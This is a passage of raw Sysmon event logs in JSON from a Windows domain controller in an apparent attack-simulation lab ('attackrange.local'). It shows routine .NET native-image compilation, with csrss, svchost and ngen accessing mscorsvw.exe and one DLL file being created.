|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8044,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.600\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-0010B1D90F00}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.600","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-0010B1D90F00}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8045,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.615\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-0010B1D90F00}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.615","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-0010B1D90F00}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8046,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.772\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2265-5F25-0000-001061680E00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.772","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2265-5F25-0000-001061680E00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8047,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.772\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2265-5F25-0000-001061680E00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.772","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2265-5F25-0000-001061680E00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8048,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:46.772\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2265-5F25-0000-001061680E00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:46.772","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2265-5F25-0000-001061680E00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8049,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:47.475\r\nProcessGuid: {41C8662E-2296-5F25-0000-001088DD0F00}\r\nProcessId: 1480\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c8-0\\System.ServiceModel.Discovery.dll\r\nCreationUtcTime: 2020-08-01 08:06:47.475","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:47.475","ProcessGuid":"{41C8662E-2296-5F25-0000-001088DD0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c8-0\\System.ServiceModel.Discovery.dll","CreationUtcTime":"2020-08-01 08:06:47.475","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8050,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:47.522\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2297-5F25-0000-00105CE40F00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:47.522","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2297-5F25-0000-00105CE40F00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8051,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:47.522\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2297-5F25-0000-00105CE40F00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:47.522","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2297-5F25-0000-00105CE40F00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8052,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:47.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2297-5F25-0000-00105CE40F00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:47.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2297-5F25-0000-00105CE40F00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
